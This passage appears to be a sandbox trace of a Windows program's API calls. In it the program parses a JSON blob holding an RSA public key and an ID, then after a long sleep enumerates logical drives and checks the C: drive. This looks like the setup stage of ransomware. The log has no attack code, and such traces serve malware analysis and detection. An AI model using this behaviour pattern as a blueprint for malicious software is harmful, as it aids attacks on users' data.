KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.762] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.762] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.762] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.762] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.762] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.762] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.762] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" [0041.762] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f8d8 | out: hHeap=0x660000) returned 1 [0041.763] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.763] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x440) returned 0x322c750 [0041.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfdaa778, cbMultiByte=-1, lpWideCharStr=0x322c750, cchWideChar=544 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 544 [0041.763] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" [0041.763] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0041.763] lstrlenA (lpString="\",\"id\":\"") returned 8 [0041.763] lstrcpyA (in: lpString1=0xfdaab78, lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" | out: lpString1="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" [0041.763] lstrcpyA (in: lpString1=0xfdaa778, lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" | out: lpString1="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" [0041.763] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.763] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.763] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.763] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.763] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.763] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.763] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.763] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.763] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.763] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.763] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.763] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.763] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.763] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.763] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.763] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.763] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.763] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.763] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.763] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.763] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.763] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.763] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.763] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.763] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.763] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.763] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.763] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.764] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.764] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.764] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.764] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.764] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.764] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.764] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.764] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.764] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.764] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.764] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.764] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.764] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.764] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257128 [0041.764] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x854) returned 0x326ab68 [0041.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3257128, cbMultiByte=-1, lpWideCharStr=0x326ab68, cchWideChar=1066 | out: lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 43 [0041.764] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3266ff0 [0041.764] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326ab68 | out: hHeap=0x660000) returned 1 [0041.764] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257128 | out: hHeap=0x660000) returned 1 [0041.764] lstrcpyW (in: lpString1=0x521cf0, lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" | out: lpString1="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" [0041.764] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3266ff0 | out: hHeap=0x660000) returned 1 [0041.764] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0041.764] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x56) returned 0x32367a0 [0041.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfdaa778, cbMultiByte=-1, lpWideCharStr=0x32367a0, cchWideChar=43 | out: lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 43 [0041.764] lstrcpyW (in: lpString1=0x521cf0, lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" | out: lpString1="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" [0041.764] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0041.764] lstrlenW (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 40 [0041.770] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a7a0 | out: hHeap=0x660000) returned 1 Thread: id = 46 os_tid = 0x9e0 [0042.705] timeGetTime () returned 0x1144569 [0042.705] GetLastError () returned 0x54f [0042.705] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x3bc) returned 0x32b3200 [0042.705] GetCurrentThreadId () returned 0x9e0 [0042.705] SetLastError (dwErrCode=0x54f) [0042.705] Sleep (dwMilliseconds=0x96258) [0054.876] Sleep (dwMilliseconds=0x3e8) [0056.032] GetLogicalDrives () returned 0x4 [0056.032] SetErrorMode (uMode=0x1) returned 0x0 [0056.033] PathFileExistsA (pszPath="C:\\") returned 1 [0056.033] SetErrorMode (uMode=0x0) returned 0x1 [0056.033] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0056.033] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x806) returned 0x3297a68 [0056.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9f4fe60, cbMultiByte=-1, lpWideCharStr=0x3297a68, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0056.034] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5d1d0 [0056.034] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0056.034] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x6a9f50 [0056.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.049] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.050] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.050] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.050] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.050] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.050] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.050] HeapFree (in: 